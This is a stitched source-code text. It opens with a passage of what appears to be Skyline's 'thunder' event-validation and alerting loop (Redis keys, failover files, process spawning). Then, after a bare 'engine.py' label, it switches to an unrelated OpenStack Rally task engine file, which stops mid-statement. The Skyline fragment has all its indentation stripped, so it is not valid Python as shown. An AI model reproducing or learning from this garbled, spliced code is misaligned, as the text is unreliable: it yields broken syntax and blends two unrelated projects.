validated_event_details['level'] = level
try:
event_type = str(event_details['event_type'])
except KeyError:
event_type = str(event_details['type'])
except Exception as e:
logger.error('error :: failed to determine type from event_details dict - %s' % (
e))
event_type = False
validated_event_details['event_type'] = event_type
try:
message = str(event_details['message'])
except KeyError:
message = False
except Exception as e:
logger.error('error :: failed to determine message from event_details dict - %s' % (
e))
message = False
validated_event_details['message'] = message
try:
app = str(event_details['app'])
except KeyError:
app = False
except Exception as e:
logger.error('error :: failed to determine app from event_details dict - %s' % (
e))
app = False
validated_event_details['app'] = app
try:
metric = str(event_details['metric'])
except KeyError:
metric = False
except Exception as e:
logger.error('error :: failed to determine metric from event_details dict - %s' % (
e))
metric = False
validated_event_details['metric'] = metric
try:
source = str(event_details['source'])
except KeyError:
source = False
except Exception as e:
logger.error('error :: failed to determine source from event_details dict - %s' % (
e))
source = False
validated_event_details['source'] = source
try:
expiry = int(event_details['expiry'])
except KeyError:
expiry = 900
except Exception as e:
logger.error('error :: failed to determine expiry from event_details dict - %s' % (
e))
expiry = 900
validated_event_details['expiry'] = expiry
try:
timestamp = event_details['timestamp']
except KeyError:
timestamp = int(time())
except Exception as e:
logger.error('error :: failed to determine timestamp from event_details dict - %s' % (
e))
timestamp = int(time())
validated_event_details['timestamp'] = timestamp
try:
alert_vias = event_details['alert_vias']
except KeyError:
alert_vias = []
except Exception as e:
logger.error('error :: failed to determine alert_vias from event_details dict - %s' % (
e))
alert_vias = []
validated_event_details['alert_vias'] = alert_vias
if source == 'thunder':
validated_event_details['alert_vias'] = ['default']
try:
data = event_details['data']
except Exception as e:
logger.error('error :: failed to determine data from event_details dict - %s' % (
e))
data = {'status': None}
validated_event_details['data'] = data
# Add the event_file, this is related to files used
# for events and keys where a Redis failure is
# experienced
try:
event_file = event_details['event_file']
except KeyError:
event_file = None
except Exception as e:
logger.error('error :: failed to determine event_file from event_details dict - %s' % (
e))
event_file = None
validated_event_details['event_file'] = event_file
if not event_type:
missing_required_keys = True
if not app:
missing_required_keys = True
if not message:
missing_required_keys = True
if missing_required_keys or remove_item:
logger.info('invalidating thunder event_details, missing_required_keys: %s' % str(missing_required_keys))
validated_event_details = {}
if not event_file:
# Delete the bad item in the Redis set
try:
removed_item = update_redis_set(
skyline_app, thunder_redis_set, event_item,
'remove', log=True)
if removed_item:
logger.error('error :: could not determine event_details from %s Redis set entry (removed) - %s' % (
thunder_redis_set, str(event_item)))
except Exception as e:
logger.error('error :: could not remove bad item from Redis set %s - %s' % (
thunder_redis_set, e))
else:
# Delete the bad event_file
removed_file = False
try:
removed_file = remove_file(skyline_app, event_file)
except Exception as e:
logger.error('error :: could not remove bad event_file %s - %s' % (
event_file, e))
if removed_file:
logger.error('error :: could not determine event_details from the event_file (removed) - %s' % (
str(event_file)))
continue
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: validating and checking event - %s' % (
e))
if validated_event_details:
logger.info('thunder event_details validated')
if validated_event_details['source'] == 'thunder':
validated_event_details['alert_vias'] = ['default']
logger.info('thunder event_details validated')
# Check if an alert has gone out if so removed the item
if validated_event_details and level == 'alert':
alert_cache_key = 'thunder.alert.%s.%s.%s.%s' % (
app, event_type, level, str(timestamp))
alerted = None
try:
alerted = self.redis_conn_decoded.get(alert_cache_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s Redis key - %s' % (
alert_cache_key, e))
if not alerted:
alerted = check_thunder_failover_key(self, alert_cache_key)
if alerted:
logger.info('alert already sent for %s, removing event item' % alert_cache_key)
validated_event_details = {}
if redis_item:
# Delete the item from the Redis set
try:
removed_item = update_redis_set(
skyline_app, thunder_redis_set, redis_item,
'remove', log=True)
if removed_item:
logger.info('alert key exists, removed event_details from %s Redis set entry - %s' % (
thunder_redis_set, str(redis_item)))
except Exception as e:
logger.error('error :: could not remove item from Redis set %s - %s' % (
thunder_redis_set, e))
if event_file:
# Delete the bad event_file
removed_file = False
try:
removed_file = remove_file(skyline_app, event_file)
except Exception as e:
logger.error('error :: could not remove event_file %s - %s' % (
event_file, e))
if removed_file:
logger.info('alert key exists, event_file removed - %s' % (
str(event_file)))
continue
if validated_event_details:
# Check if the event has been actioned in the
# current run, if so skip.
# until the key expires
current_event_cache_key = 'thunder.current.%s.%s.%s.%s' % (
app, event_type, level, str(timestamp))
current_event = None
try:
current_event = self.redis_conn_decoded.get(current_event_cache_key)
if current_event:
logger.info('current_event_cache_key exist in Redis %s for this event, skipping' % current_event_cache_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s Redis key - %s' % (
current_event_cache_key, e))
if not current_event:
current_event = check_thunder_failover_key(self, current_event_cache_key)
if current_event:
logger.info('current_event_cache_key exist %s as a check_thunder_failover_key for this event, skipping' % current_event_cache_key)
if current_event:
validated_event_details = {}
logger.info('current_event_cache_key exist %s for this event, skipping' % current_event_cache_key)
# continue
if validated_event_details:
try:
self.redis_conn_decoded.setex(current_event_cache_key, 59, int(time()))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: failed to setex %s Redis key - %s' % (
current_event_cache_key, e))
try:
failover_key_file = '%s/%s' % (THUNDER_KEYS_DIR, current_event_cache_key)
failover_key_data = {'timestamp': int(time()), 'expiry': 59}
write_data_to_file(
skyline_app, failover_key_file, 'w',
str(failover_key_data))
logger.info('added Redis failover - failover_key_file - %s' % (failover_key_file))
except Exception as e:
logger.error('error :: failed to add Redis failover failover_key_file - %s - %s' % (failover_key_file, e))
redis_item = event_item
break
if not validated_event_details:
sleep_for = 30
right_now = int(time())
next_send_to_graphite = last_sent_to_graphite + 60
if right_now >= next_send_to_graphite:
sleep_for = 0.1
if (next_send_to_graphite - right_now) < sleep_for:
sleep_for = next_send_to_graphite - right_now
sleep(sleep_for)
if validated_event_details:
logger.info('processing 1 event of %s thunder events to process' % str(total_thunder_events_item_count))
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
THUNDER_PROCESSES = 1
for i in range(1, THUNDER_PROCESSES + 1):
p = Process(target=self.spin_thunder_process, args=(i, validated_event_details, redis_item, event_file))
pids.append(p)
pid_count += 1
logger.info('starting spin_thunder_process')
p.start()
spawned_pids.append(p.pid)
thunder_alerts_sent += 1
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_thunder_process
# that has run for longer than 58 seconds
p_starts = time()
while time() - p_starts <= 58:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('1 spin_thunder_process completed in %.2f seconds' % (time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all spin_thunder_process processes')
for p in pids:
p.terminate()
# p.join()
for p in pids:
if p.is_alive():
logger.info('stopping spin_thunder_process - %s' % (str(p.is_alive())))
p.join()
if int(time()) >= (last_sent_to_graphite + 60):
logger.info('alerts.sent :: %s' % str(thunder_alerts_sent))
send_metric_name = '%s.alerts.sent' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str(thunder_alerts_sent))
last_sent_to_graphite = int(time())
thunder_alerts_sent = 0
try:
thunder_events = self.redis_conn_decoded.smembers(thunder_redis_set)
except Exception as e:
logger.error('error :: could not query Redis for set %s - %s' % (thunder_redis_set, e))
|
engine.py | # Copyright 2013: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import json
import threading
import time
import traceback
import jsonschema
from oslo_config import cfg
from rally.common import logging
from rally.common import objects
from rally.common import utils
from rally import consts
from rally import exceptions
from rally.task import context
from rally.task import hook
from rally.task import runner
from rally.task import scenario
from rally.task import sla
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
TASK_ENGINE_OPTS = [
cfg.IntOpt("raw_result_chunk_size", default=1000, min=1,
help="Size of raw result chunk in iterations"),
]
class ResultConsumer(object):
    """ResultConsumer class stores results from ScenarioRunner, checks SLA.

    Also ResultConsumer listens for runner events and notifies HookExecutor
    about started iterations.

    Intended to be used as a context manager wrapped around ``runner.run``:
    entering starts the consumer threads, exiting joins them and persists
    the collected workload data and SLA results.
    """

    def __init__(self, workload_cfg, task, subtask, workload, runner,
                 abort_on_sla_failure):
        """ResultConsumer constructor.

        :param workload_cfg: A configuration of the Workload
        :param task: Instance of Task, task to run
        :param subtask: Instance of Subtask
        :param workload: Instance of Workload
        :param runner: ScenarioRunner instance that produces results to be
                       consumed
        :param abort_on_sla_failure: True if the execution should be stopped
                                     when some SLA check fails
        """
        self.task = task
        self.subtask = subtask
        self.workload = workload
        self.workload_cfg = workload_cfg
        self.runner = runner
        # Load window boundaries: narrowed/widened per-iteration in
        # _consume_results (min of start timestamps, max of end timestamps).
        self.load_started_at = float("inf")
        self.load_finished_at = 0
        # Counts data chunks already persisted via add_workload_data; used
        # as the chunk index for the next write.
        self.workload_data_count = 0

        self.sla_checker = sla.SLAChecker(self.workload_cfg)
        self.hook_executor = hook.HookExecutor(self.workload_cfg, self.task)
        self.abort_on_sla_failure = abort_on_sla_failure
        # Signals all consumer threads to stop polling their queues.
        self.is_done = threading.Event()
        self.unexpected_failure = {}
        self.results = []
        self.thread = threading.Thread(target=self._consume_results)
        self.aborting_checker = threading.Thread(target=self.wait_and_abort)
        # The event thread is only created when hooks are configured, so
        # __exit__ must guard its join() the same way.
        if self.workload_cfg["hooks"]:
            self.event_thread = threading.Thread(target=self._consume_events)

    def __enter__(self):
        # Start result/abort (and optionally event) consumer threads, then
        # record the wall-clock start used for the "full duration" metric.
        self.thread.start()
        self.aborting_checker.start()
        if self.workload_cfg["hooks"]:
            self.event_thread.start()
        self.start = time.time()
        return self

    def _consume_results(self):
        """Drain runner.result_queue, feed the SLA checker, persist chunks.

        Runs in a dedicated thread until ``is_done`` is set AND the queue
        has been observed empty.
        """
        task_aborted = False
        while True:
            if self.runner.result_queue:
                results = self.runner.result_queue.popleft()
                self.results.extend(results)
                for r in results:
                    # Track the overall load window across all iterations.
                    self.load_started_at = min(r["timestamp"],
                                               self.load_started_at)
                    self.load_finished_at = max(r["duration"] + r["timestamp"],
                                                self.load_finished_at)
                    success = self.sla_checker.add_iteration(r)
                    # Abort at most once, on the first SLA failure.
                    if (self.abort_on_sla_failure and
                            not success and
                            not task_aborted):
                        self.sla_checker.set_aborted_on_sla()
                        self.runner.abort()
                        self.task.update_status(
                            consts.TaskStatus.SOFT_ABORTING)
                        task_aborted = True

                # save results chunks
                chunk_size = CONF.raw_result_chunk_size
                while len(self.results) >= chunk_size:
                    results_chunk = self.results[:chunk_size]
                    self.results = self.results[chunk_size:]
                    results_chunk.sort(key=lambda x: x["timestamp"])
                    self.workload.add_workload_data(self.workload_data_count,
                                                    {"raw": results_chunk})
                    self.workload_data_count += 1

            elif self.is_done.isSet():
                break
            else:
                # Queue empty but runner still active: poll again shortly.
                time.sleep(0.1)

    def _consume_events(self):
        """Forward runner events (e.g. iteration starts) to the hooks."""
        # Unlike _consume_results, keep draining after is_done as long as
        # events remain queued.
        while not self.is_done.isSet() or self.runner.event_queue:
            if self.runner.event_queue:
                event = self.runner.event_queue.popleft()
                self.hook_executor.on_event(
                    event_type=event["type"], value=event["value"])
            else:
                time.sleep(0.01)

    def __exit__(self, exc_type, exc_value, exc_traceback):
        """Stop consumer threads and persist remaining results and SLA data."""
        self.finish = time.time()
        self.is_done.set()
        self.aborting_checker.join()
        self.thread.join()

        if exc_type:
            # An exception escaped the runner context: record it as an
            # SLA-visible unexpected failure (the exception itself still
            # propagates, since __exit__ returns None).
            self.sla_checker.set_unexpected_failure(exc_value)

        if objects.Task.get_status(
                self.task["uuid"]) == consts.TaskStatus.ABORTED:
            self.sla_checker.set_aborted_manually()

        # Guard against a negative duration when no iteration ever ran
        # (load_started_at stays at +inf).
        load_duration = max(self.load_finished_at - self.load_started_at, 0)

        LOG.info("Load duration is: %s" % utils.format_float_to_str(
            load_duration))
        LOG.info("Full runner duration is: %s" %
                 utils.format_float_to_str(self.runner.run_duration))
        LOG.info("Full duration is: %s" % utils.format_float_to_str(
            self.finish - self.start))

        results = {}
        if self.workload_cfg["hooks"]:
            self.event_thread.join()
            results["hooks_results"] = self.hook_executor.results()

        if self.results:
            # NOTE(boris-42): Sort in order of starting
            #                 instead of order of ending
            self.results.sort(key=lambda x: x["timestamp"])
            self.workload.add_workload_data(self.workload_data_count,
                                            {"raw": self.results})
        start_time = (self.load_started_at
                      if self.load_started_at != float("inf") else None)
        self.workload.set_results(load_duration=load_duration,
                                  full_duration=(self.finish - self.start),
                                  sla_results=self.sla_checker.results(),
                                  start_time=start_time, **results)

    @staticmethod
    def is_task_in_aborting_status(task_uuid, check_soft=True):
        """Checks task is in abort stages

        :param task_uuid: UUID of task to check status
        :type task_uuid: str
        :param check_soft: check or not SOFT_ABORTING status
        :type check_soft: bool
        """
        stages = [consts.TaskStatus.ABORTING, consts.TaskStatus.ABORTED]
        if check_soft:
            stages.append(consts.TaskStatus.SOFT_ABORTING)
        return objects.Task.get_status(task_uuid) in stages

    def wait_and_abort(self):
        """Waits until abort signal is received and aborts runner in this case.

        Has to be run from different thread simultaneously with the
        runner.run method.
        """
        while not self.is_done.isSet():
            # Only hard ABORTING/ABORTED trigger here; SOFT_ABORTING is
            # handled by the SLA path in _consume_results.
            if self.is_task_in_aborting_status(self.task["uuid"],
                                               check_soft=False):
                self.runner.abort()
                self.task.update_status(consts.TaskStatus.ABORTED)
                break
            time.sleep(2.0)
class TaskAborted(Exception):
    """Raised internally to interrupt a task run.

    TaskEngine uses this exception as a control-flow signal when a task
    has been aborted, so the run/subtask loops can unwind cleanly.
    """
class TaskEngine(object):
    """The Task engine class is used to execute benchmark scenarios.

    An instance of this class is initialized by the API with the task
    configuration and then is used to validate and execute all specified
    in config subtasks.

    .. note::

        Typical usage:
            ...
            engine = TaskEngine(config, task, deployment)
            engine.validate()  # to test config
            engine.run()       # to run config
    """

    def __init__(self, config, task, deployment,
                 abort_on_sla_failure=False):
        """TaskEngine constructor.

        :param config: An instance of a TaskConfig
        :param task: Instance of Task,
                     the current task which is being performed
        :param deployment: Instance of Deployment,
        :param abort_on_sla_failure: True if the execution should be stopped
                                     when some SLA check fails
        """
        self.config = config
        self.task = task
        self.deployment = deployment
        self.abort_on_sla_failure = abort_on_sla_failure

    def _validate_workload(self, workload, vcontext=None, vtype=None):
        """Validate a workload.

        Collects validation messages from the scenario plugin, its runner,
        every context (explicit and scenario-default), every SLA and every
        hook action/trigger, then raises if anything failed.

        :param workload: a workload configuration
        :param vcontext: a validation context
        :param vtype: a type of validation (platform, syntax or semantic)
        :raises InvalidTaskConfig: if any plugin reports a validation error
        """
        scenario_cls = scenario.Scenario.get(workload["name"])
        # deepcopy: the default context dict is plugin-owned and must not
        # be mutated by validation.
        scenario_context = copy.deepcopy(scenario_cls.get_default_context())
        results = []
        results.extend(scenario.Scenario.validate(
            name=workload["name"],
            context=vcontext,
            config=workload,
            plugin_cfg=None,
            vtype=vtype))

        if workload["runner_type"]:
            results.extend(runner.ScenarioRunner.validate(
                name=workload["runner_type"],
                context=vcontext,
                config=None,
                plugin_cfg=workload["runner"],
                vtype=vtype))

        # Contexts configured explicitly in the workload.
        for context_name, context_conf in workload["contexts"].items():
            results.extend(context.Context.validate(
                name=context_name,
                context=vcontext,
                config=None,
                plugin_cfg=context_conf,
                vtype=vtype))
        # Contexts injected by the scenario's defaults; hidden plugins are
        # allowed here since they are not user-specified.
        for context_name, context_conf in scenario_context.items():
            results.extend(context.Context.validate(
                name=context_name,
                context=vcontext,
                config=None,
                plugin_cfg=context_conf,
                allow_hidden=True,
                vtype=vtype))

        for sla_name, sla_conf in workload["sla"].items():
            results.extend(sla.SLA.validate(
                name=sla_name,
                context=vcontext,
                config=None,
                plugin_cfg=sla_conf,
                vtype=vtype))

        for hook_conf in workload["hooks"]:
            action_name, action_cfg = hook_conf["action"]
            results.extend(hook.HookAction.validate(
                name=action_name,
                context=vcontext,
                config=None,
                plugin_cfg=action_cfg,
                vtype=vtype))

            trigger_name, trigger_cfg = hook_conf["trigger"]
            results.extend(hook.HookTrigger.validate(
                name=trigger_name,
                context=vcontext,
                config=None,
                plugin_cfg=trigger_cfg,
                vtype=vtype))

        if results:
            msg = "\n ".join(results)
            kw = {"name": workload["name"],
                  "pos": workload["position"],
                  "config": json.dumps(
                      objects.Workload.to_task(workload)),
                  "reason": msg}
            raise exceptions.InvalidTaskConfig(**kw)

    @logging.log_task_wrapper(LOG.info, "Task validation of syntax.")
    def _validate_config_syntax(self, config):
        # Syntax validation needs no deployment access: check every
        # workload of every subtask in isolation.
        for subtask in config.subtasks:
            for workload in subtask["workloads"]:
                self._validate_workload(workload, vtype="syntax")

    @logging.log_task_wrapper(LOG.info,
                              "Task validation of required platforms.")
    def _validate_config_platforms(self, config):
        # FIXME(andreykurilin): prepare the similar context object to others
        credentials = self.deployment.get_all_credentials()
        # NOTE(review): only the first credential (creds[0]) of each
        # platform is exposed to validators — presumably the admin one;
        # confirm against Deployment.get_all_credentials ordering.
        ctx = {"task": self.task,
               "platforms": dict((p, creds[0])
                                 for p, creds in credentials.items())}
        for subtask in config.subtasks:
            for workload in subtask["workloads"]:
                self._validate_workload(
                    workload, vcontext=ctx, vtype="platform")

    @logging.log_task_wrapper(LOG.info, "Task validation of semantic.")
    def _validate_config_semantic(self, config):
        # Semantic validation talks to the live deployment, so verify
        # connectivity first and run inside a real validation context.
        self.deployment.verify_connections()
        validation_ctx = self.deployment.get_validation_context()
        ctx_obj = {"task": self.task, "config": validation_ctx}
        with context.ContextManager(ctx_obj):
            for subtask in config.subtasks:
                for workload in subtask["workloads"]:
                    self._validate_workload(
                        workload, vcontext=ctx_obj, vtype="semantic")

    @logging.log_task_wrapper(LOG.info, "Task validation.")
    def validate(self, only_syntax=False):
        """Perform full task configuration validation.

        Runs syntax, platform and semantic validation in order; on any
        failure the task is marked failed and InvalidTaskException raised.

        :param only_syntax: Check only syntax of task configuration
        :raises InvalidTaskException: if any validation stage fails
        """
        self.task.update_status(consts.TaskStatus.VALIDATING)
        try:
            self._validate_config_syntax(self.config)
            if only_syntax:
                return
            self._validate_config_platforms(self.config)
            self._validate_config_semantic(self.config)
        except Exception as e:
            # Persist the full traceback with the task before re-raising a
            # uniform exception type for the API layer.
            exception_info = json.dumps(traceback.format_exc(), indent=2,
                                        separators=(",", ": "))
            self.task.set_failed(type(e).__name__, str(e), exception_info)
            if (logging.is_debug() and
                    not isinstance(e, exceptions.InvalidTaskConfig)):
                LOG.exception("Invalid Task")
            raise exceptions.InvalidTaskException(str(e))

    def _prepare_context(self, ctx, scenario_name, owner_id):
        """Build the context object passed to ContextManager and the runner.

        Merges the scenario's default contexts with the user-supplied ones
        (user values win on name collision) under plugin full names.
        """
        context_config = {}
        # restore full names of plugins
        scenario_plugin = scenario.Scenario.get(scenario_name)
        for k, v in scenario_plugin.get_default_context().items():
            c = context.Context.get(k, allow_hidden=True)
            context_config[c.get_fullname()] = v
        for k, v in ctx.items():
            context_config[context.Context.get(k).get_fullname()] = v

        context_obj = {
            "task": self.task,
            "owner_id": owner_id,
            "scenario_name": scenario_name,
            "config": context_config
        }
        return context_obj

    @logging.log_task_wrapper(LOG.info, "Running task.")
    def run(self):
        """Run the benchmark according to the test configuration.

        Test configuration is specified on engine initialization.

        :returns: List of dicts, each dict containing the results of all the
                  corresponding benchmark test launches
        """
        self.task.update_status(consts.TaskStatus.RUNNING)
        try:
            for subtask in self.config.subtasks:
                self._run_subtask(subtask)
        except TaskAborted:
            LOG.info("Received aborting signal.")
            self.task.update_status(consts.TaskStatus.ABORTED)
        else:
            # A subtask may have marked the task ABORTED without raising;
            # only promote to FINISHED if that did not happen.
            if objects.Task.get_status(
                    self.task["uuid"]) != consts.TaskStatus.ABORTED:
                self.task.update_status(consts.TaskStatus.FINISHED)

    def _run_subtask(self, subtask):
        """Run one subtask, mapping outcomes onto SubtaskStatus."""
        subtask_obj = self.task.add_subtask(title=subtask["title"],
                                            description=subtask["description"],
                                            context=subtask["context"])
        try:
            # TODO(astudenov): add subtask context here
            for workload in subtask["workloads"]:
                self._run_workload(subtask_obj, workload)
        except TaskAborted:
            subtask_obj.update_status(consts.SubtaskStatus.ABORTED)
            raise
        except Exception:
            subtask_obj.update_status(consts.SubtaskStatus.CRASHED)
            # TODO(astudenov): save error to DB
            LOG.exception("Unexpected exception during the subtask execution")

            # NOTE(astudenov): crash task after exception in subtask
            self.task.update_status(consts.TaskStatus.CRASHED)
            raise
        else:
            subtask_obj.update_status(consts.SubtaskStatus.FINISHED)

    def _run_workload(self, subtask_obj, workload):
        """Execute a single workload under its runner, contexts and SLA."""
        # Bail out early (soft aborts included) before doing any setup.
        if ResultConsumer.is_task_in_aborting_status(self.task["uuid"]):
            raise TaskAborted()
        workload_obj = subtask_obj.add_workload(
            name=workload["name"],
            description=workload["description"],
            position=workload["position"],
            runner=workload["runner"],
            runner_type=workload["runner_type"],
            hooks=workload["hooks"],
            context=workload["contexts"],
            sla=workload["sla"],
            args=workload["args"])
        workload["uuid"] = workload_obj["uuid"]

        workload_cfg = objects.Workload.to_task(workload)
        LOG.info("Running workload: \n"
                 "  position = %(position)s\n"
                 "  config = %(cfg)s"
                 % {"position": workload["position"],
                    "cfg": json.dumps(workload_cfg, indent=3)})

        runner_cls = runner.ScenarioRunner.get(workload["runner_type"])
        runner_obj = runner_cls(self.task, workload["runner"])
        context_obj = self._prepare_context(
            workload["contexts"], workload["name"], workload_obj["uuid"])
        try:
            # ResultConsumer outer, ContextManager inner: results keep
            # flowing while contexts are being cleaned up.
            with ResultConsumer(workload, self.task, subtask_obj, workload_obj,
                                runner_obj, self.abort_on_sla_failure):
                with context.ContextManager(context_obj):
                    runner_obj.run(workload["name"], context_obj,
                                   workload["args"])
        except Exception:
            # Deliberately swallowed: a crashed workload must not stop the
            # remaining workloads of the subtask.
            LOG.exception("Unexpected exception during the workload execution")
            # TODO(astudenov): save error to DB
class TaskConfig(object):
    """Version-aware wrapper around task.

    Validates the input dict against the JSON schema of its declared
    version and normalizes both supported formats (v1 and v2) into a
    single internal representation: ``self.subtasks`` is a list of
    subtask dicts, each holding fully-populated workload dicts.
    """

    # Schema for the legacy v1 format: a mapping of scenario name to a
    # list of workload configurations.
    CONFIG_SCHEMA_V1 = {
        "type": "object",
        "$schema": consts.JSON_SCHEMA,
        "patternProperties": {
            ".*": {
                "type": "array",
                "items": {
                    "type": "object",
                    "properties": {
                        "args": {"type": "object"},
                        "description": {
                            "type": "string"
                        },
                        "runner": {
                            "type": "object",
                            "properties": {"type": {"type": "string"}},
                            "required": ["type"]
                        },
                        "context": {"type": "object"},
                        "sla": {"type": "object"},
                        "hooks": {
                            "type": "array",
                            "items": {"$ref": "#/definitions/hook"},
                        }
                    },
                    "additionalProperties": False
                }
            }
        },
        "definitions": {
            "hook": {
                "type": "object",
                "properties": {
                    "name": {"type": "string"},
                    "description": {"type": "string"},
                    "args": {},
                    "trigger": {
                        "type": "object",
                        "properties": {
                            "name": {"type": "string"},
                            "args": {},
                        },
                        "required": ["name", "args"],
                        "additionalProperties": False,
                    }
                },
                "required": ["name", "args", "trigger"],
                "additionalProperties": False,
            }
        }
    }

    # Schema for the current v2 format: an explicit list of subtasks,
    # each either a single workload or a group of workloads.
    CONFIG_SCHEMA_V2 = {
        "type": "object",
        "$schema": consts.JSON_SCHEMA,
        "properties": {
            "version": {"type": "number"},
            "title": {"type": "string", "maxLength": 128},
            "description": {"type": "string"},
            "tags": {
                "type": "array",
                "items": {"type": "string"}
            },
            "subtasks": {
                "type": "array",
                "minItems": 1,
                "items": {
                    "oneOf": [
                        {"$ref": "#/definitions/subtask-workload"},
                        {"$ref": "#/definitions/subtask-workloads"}
                    ]
                }
            }
        },
        "additionalProperties": False,
        "required": ["title", "subtasks"],
        "definitions": {
            "singleEntity": {
                "type": "object",
                "minProperties": 1,
                "maxProperties": 1,
                "patternProperties": {
                    ".*": {"type": "object"}
                }
            },
            "subtask-workload": {
                "type": "object",
                "properties": {
                    "title": {"type": "string", "maxLength": 128},
                    "group": {"type": "string"},
                    "description": {"type": "string"},
                    "tags": {
                        "type": "array",
                        "items": {"type": "string", "maxLength": 255}
                    },
                    "scenario": {"$ref": "#/definitions/singleEntity"},
                    "runner": {"$ref": "#/definitions/singleEntity"},
                    "sla": {"type": "object"},
                    "hooks": {
                        "type": "array",
                        "items": {"$ref": "#/definitions/hook"},
                    },
                    "contexts": {"type": "object"}
                },
                "additionalProperties": False,
                "required": ["title", "scenario", "runner"]
            },
            "subtask-workloads": {
                "type": "object",
                "properties": {
                    "title": {"type": "string"},
                    "group": {"type": "string"},
                    "description": {"type": "string"},
                    "tags": {
                        "type": "array",
                        "items": {"type": "string", "maxLength": 255}
                    },
                    "run_in_parallel": {"type": "boolean"},
                    "workloads": {
                        "type": "array",
                        "minItems": 1,
                        "items": {
                            "type": "object",
                            "properties": {
                                "scenario": {
                                    "$ref": "#/definitions/singleEntity"},
                                "description": {"type": "string"},
                                "runner": {
                                    "$ref": "#/definitions/singleEntity"},
                                "sla": {"type": "object"},
                                "hooks": {
                                    "type": "array",
                                    "items": {"$ref": "#/definitions/hook"},
                                },
                                "contexts": {"type": "object"}
                            },
                            "additionalProperties": False,
                            "required": ["scenario"]
                        }
                    }
                },
                "additionalProperties": False,
                "required": ["title", "workloads"]
            },
            "hook": {
                "type": "object",
                "oneOf": [
                    {
                        # Deprecated flat hook format (name/args/trigger).
                        "properties": {
                            "name": {"type": "string"},
                            "description": {"type": "string"},
                            "args": {},
                            "trigger": {
                                "type": "object",
                                "properties": {
                                    "name": {"type": "string"},
                                    "args": {},
                                },
                                "required": ["name", "args"],
                                "additionalProperties": False,
                            }
                        },
                        "required": ["name", "args", "trigger"],
                        "additionalProperties": False
                    },
                    {
                        # Current hook format (action/trigger entities).
                        "properties": {
                            "action": {
                                "type": "object",
                                "minProperties": 1,
                                "maxProperties": 1,
                                "patternProperties": {".*": {}}
                            },
                            "trigger": {"$ref": "#/definitions/singleEntity"},
                            "description": {"type": "string"},
                        },
                        "required": ["action", "trigger"],
                        "additionalProperties": False
                    },
                ]
            }
        }
    }

    CONFIG_SCHEMAS = {1: CONFIG_SCHEMA_V1, 2: CONFIG_SCHEMA_V2}

    def __init__(self, config):
        """TaskConfig constructor.

        Validates and represents different versions of task configuration in
        unified form.

        :param config: Dict with configuration of specified task
        :raises Exception: in case of validation error. (This gets reraised as
            InvalidTaskException. if we raise it here as InvalidTaskException,
            then "Task config is invalid: " gets prepended to the message twice
        """
        if config is None:
            raise Exception("Input task is empty")

        self.version = self._get_version(config)
        self._validate_version()
        self._validate_json(config)

        if self.version == 1:
            config = self._adopt_task_format_v1(config)

        self.title = config.get("title", "Task")
        self.tags = config.get("tags", [])
        self.description = config.get("description")

        self.subtasks = []
        for sconf in config["subtasks"]:
            # deepcopy so normalization never mutates the caller's config
            sconf = copy.deepcopy(sconf)

            # fill all missed properties of a SubTask
            sconf.setdefault("tags", [])
            sconf.setdefault("description", "")

            # port the subtask to a single format before validating
            if "workloads" not in sconf and "scenario" in sconf:
                workload = sconf
                sconf = {"title": workload.pop("title"),
                         "description": workload.pop("description"),
                         "tags": workload.pop("tags"),
                         "workloads": [workload]}

            # it is not supported feature yet, but the code expects this
            # variable
            sconf.setdefault("context", {})

            workloads = []
            for position, wconf in enumerate(sconf["workloads"]):
                # fill all missed properties of a Workload: the single
                # {name: args} scenario entity is split into two keys
                wconf["name"], wconf["args"] = list(
                    wconf["scenario"].items())[0]
                del wconf["scenario"]
                wconf["position"] = position

                if not wconf.get("description", ""):
                    try:
                        wconf["description"] = scenario.Scenario.get(
                            wconf["name"]).get_info()["title"]
                    except (exceptions.PluginNotFound,
                            exceptions.MultiplePluginsFound):
                        # let's fail an issue with loading plugin at a
                        # validation step
                        pass

                wconf.setdefault("contexts", {})

                if "runner" in wconf:
                    runner = list(wconf["runner"].items())[0]
                    wconf["runner_type"], wconf["runner"] = runner
                else:
                    # no runner configured -> run the scenario once
                    wconf["runner_type"] = "serial"
                    wconf["runner"] = {}

                wconf.setdefault("sla", {"failure_rate": {"max": 0}})

                hooks = wconf.get("hooks", [])
                wconf["hooks"] = []
                for hook_cfg in hooks:
                    if "name" in hook_cfg:
                        LOG.warning("The deprecated format of hook is found. "
                                    "Check task format documentation for more "
                                    "details.")
                        trigger_cfg = hook_cfg["trigger"]
                        wconf["hooks"].append({
                            # "description" is optional in the deprecated
                            # hook schema, so use .get() (consistent with
                            # _adopt_task_format_v1) instead of indexing,
                            # which raised KeyError when it was absent.
                            "description": hook_cfg.get("description"),
                            "action": (hook_cfg["name"], hook_cfg["args"]),
                            "trigger": (
                                trigger_cfg["name"], trigger_cfg["args"])})
                    else:
                        hook_cfg["action"] = list(
                            hook_cfg["action"].items())[0]
                        hook_cfg["trigger"] = list(
                            hook_cfg["trigger"].items())[0]
                        wconf["hooks"].append(hook_cfg)

                workloads.append(wconf)
            sconf["workloads"] = workloads
            self.subtasks.append(sconf)

        # if self.version == 1:
        # TODO(ikhudoshyn): Warn user about deprecated format

    @staticmethod
    def _get_version(config):
        """Return the declared config version (defaults to 1)."""
        return config.get("version", 1)

    def _validate_version(self):
        """Raise InvalidTaskException for unknown config versions."""
        if self.version not in self.CONFIG_SCHEMAS:
            allowed = ", ".join([str(k) for k in self.CONFIG_SCHEMAS])
            msg = ("Task configuration version %s is not supported. "
